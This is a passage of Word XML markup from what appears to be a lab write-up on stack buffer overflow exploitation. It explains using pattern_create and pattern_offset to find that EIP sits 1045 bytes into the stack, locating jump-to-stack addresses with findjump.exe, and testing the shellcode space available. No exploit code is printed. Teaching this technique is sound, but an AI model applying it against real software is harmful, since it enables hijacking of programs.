                    <a:ln>
                      <a:noFill/>
                      <a:prstDash/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B9E587" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Ref71474034"/>
      <w:bookmarkStart w:id="24" w:name="_Toc71564043"/>
      <w:r>
        <w:t>Figure 7 - Pattern Create Command</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="57C35A2D" w14:textId="77777777" w:rsidR="00AD2FFF" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9252" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7514"/>
        <w:gridCol w:w="1738"/>
      </w:tblGrid>
      <w:tr w:rsidR="00164B2A" w14:paraId="53AB29F7" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7C675DBD" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Then, this pattern can be substituted in Pattern.pl (Appendix A - </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> REF _Ref71474141 </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Pattern.pl</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">) instead of the buffer. This will create a payload of different characters and by looking at what the content of EIP is such as in </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> REF _Ref71474324 </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Figure 8 - Pattern EIP Value</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>. It is then possible to locate where in the pattern it is and thereby ascertain how far into the stack the EIP is. Knowing the location of EIP means that it can be overwritten with the location of the shellcode, allowing for the exploit to execute.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2484235B" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1738" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7C4D3219" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:keepNext/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="284"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="305B86A5" wp14:editId="42493797">
                  <wp:extent cx="714240" cy="152280"/>
                  <wp:effectExtent l="0" t="0" r="0" b="120"/>
                  <wp:docPr id="1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714240" cy="152280"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                            <a:prstDash/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="3887D355" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Caption"/>
              <w:ind w:left="284"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="25" w:name="_Ref71474324"/>
            <w:bookmarkStart w:id="26" w:name="_Toc71564044"/>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Figure 8 - Pattern EIP Value</w:t>
            </w:r>
            <w:bookmarkEnd w:id="25"/>
            <w:bookmarkEnd w:id="26"/>
          </w:p>
          <w:p w14:paraId="4DC32D3C" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="284"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6875DA65" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Then, using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pattern_offset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command it is possible to figure out where this falls in the pattern (</w:t>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:instrText xml:space="preserve"> REF _Ref71474491 </w:instrText>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>Figure 9 - Pattern Offset Command</w:t>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>). The first number passed to the program is the number in the EIP and the second number is the length of the pattern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C484397" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:keepNext/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DE678EB" wp14:editId="5DB999C6">
            <wp:extent cx="5943600" cy="779040"/>
            <wp:effectExtent l="0" t="0" r="0" b="2010"/>
            <wp:docPr id="1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943600" cy="779040"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                      <a:prstDash/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B55A4BD" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Ref71474491"/>
      <w:bookmarkStart w:id="28" w:name="_Toc71564045"/>
      <w:r>
        <w:t>Figure 9 - Pattern Offset Command</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="2F9DB8EF" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>This shows that the EIP is 1045 characters into the stack. Knowing this, it is then possible to inject shellcode into the application and get the EIP to point at the desired code. First, it is important to find a line in the code that jumps to the stack so we can trigger the code we put on there. By running the findjump.exe (</w:t>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:instrText xml:space="preserve"> REF _Ref71474624 </w:instrText>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>Figure 10 - Find Jump Command</w:t>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>) it is possible to identify the addresses of lines that jump to the top of the stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CC6D3C" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:keepNext/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="344D28EE" wp14:editId="0F2810CD">
            <wp:extent cx="5962680" cy="1609560"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15"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962680" cy="1609560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                      <a:prstDash/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D876A6B" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Ref71474624"/>
      <w:bookmarkStart w:id="30" w:name="_Toc71564046"/>
      <w:r>
        <w:t>Figure 10 - Find Jump Command</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="5F0A599F" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B1CFEEE" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc71564005"/>
      <w:r>
        <w:t>Determining Available Space</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="126CC5F5" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71F30525" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>Now that the information required to take control of the EIP has been identified the next step is to check that there is enough space on the stack to run shellcode. This will be done by adding extra text after the EIP and checking if it is overwritten.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13193EAD" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To do this the text must first be generated. For this example, the “pattern create” script was used again but with a 1600-character length outputted, as seen in </w:t>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:instrText xml:space="preserve"> REF _Ref71474728 </w:instrText>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>Figure 11 - Pattern Create Command</w:t>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. This size was chosen as it would be unlikely that any more space than that would be required. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>As long as</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> there are more than 32 bytes available, then it is possible to use some exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A862B6B" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F192FE3" wp14:editId="544EDFC5">
            <wp:extent cx="5943600" cy="785520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16"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943600" cy="785520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                      <a:prstDash/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="183C8708" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Ref71474728"/>
      <w:bookmarkStart w:id="33" w:name="_Toc71564047"/>
      <w:r>
        <w:t>Figure 11 - Pattern Create Command</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="65150B9B" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Once this was achieved a script was used to generate a file to inject, as seen in Appendix A - </w:t>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:instrText xml:space="preserve"> REF _Ref71475071 </w:instrText>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>Crashspace.pl</w:t>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. When creating this script there are two considerations, as highlighted in </w:t>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:instrText xml:space="preserve"> REF _Ref71475279 </w:instrText>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>Figure 12 - Excerpt of Crashspace.pl</w:t>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. First is the distance to EIP previously discovered. The second is the pattern generated above. The first should dictate the number of values in junk1 and the second should be the content of junk2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736B2102" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70EB6D44" wp14:editId="12CBCEB4">
            <wp:extent cx="5797440" cy="1305000"/>
            <wp:effectExtent l="0" t="0" r="0" b="9450"/>
            <wp:docPr id="17"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797440" cy="1305000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                      <a:prstDash/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDE328C" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Ref71475279"/>
      <w:bookmarkStart w:id="35" w:name="_Toc71564048"/>
      <w:r>
        <w:t>Figure 12 - Excerpt of Crashspace.pl</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="3A46298F" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>Once this is done the file can be submitted to the application, as shown in Submitting Files.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4555"/>
        <w:gridCol w:w="4805"/>
      </w:tblGrid>
      <w:tr w:rsidR="00164B2A" w14:paraId="2780CB1B" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1058"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9359" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="30B520CD" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Looking at the stack it should be possible to scroll down to the end of the stack, as seen in </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> REF _Ref71475519 </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Figure 13 - End of Stack</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>. Then, copy the last digits in the stack.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FB827C0" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">By searching the pattern string for this value, it is possible to determine where the stack starts overwriting the values. In this case it can be seen in </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> REF _Ref71475526 </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Figure 14 - </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> that the last value on the stack is the same as the last item in the random list. This means that none of the characters were overwritten and therefore there are at least 1600 available bytes on the stack.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46D9AAF8" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00164B2A" w14:paraId="3BF39FC2" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4555" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="12FC8A93" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:keepNext/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FC592C1" wp14:editId="499BB4E7">
                  <wp:extent cx="2419200" cy="2152080"/>
                  <wp:effectExtent l="0" t="0" r="150" b="570"/>
                  <wp:docPr id="18"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9200" cy="2152080"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                            <a:prstDash/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D5CF2FA" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Caption"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="36" w:name="_Ref71475519"/>
            <w:bookmarkStart w:id="37" w:name="_Toc71564049"/>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Figure 13 - End of Stack</w:t>
            </w:r>
            <w:bookmarkEnd w:id="36"/>
            <w:bookmarkEnd w:id="37"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4804" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="71E26F42" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:keepNext/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7577E3FF" wp14:editId="1372A4ED">
                  <wp:extent cx="3051000" cy="2124000"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="19"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051000" cy="2124000"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                            <a:prstDash/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="16D31C5B" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Caption"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="38" w:name="_Ref71475526"/>
            <w:bookmarkStart w:id="39" w:name="_Toc71564050"/>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Figure 14 - </w:t>
            </w:r>
            <w:bookmarkEnd w:id="38"/>
            <w:bookmarkEnd w:id="39"/>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Search box</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0C44A102" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FE180CD" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4916FF5B" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc71564006"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Character Filtering</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="124F1975" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
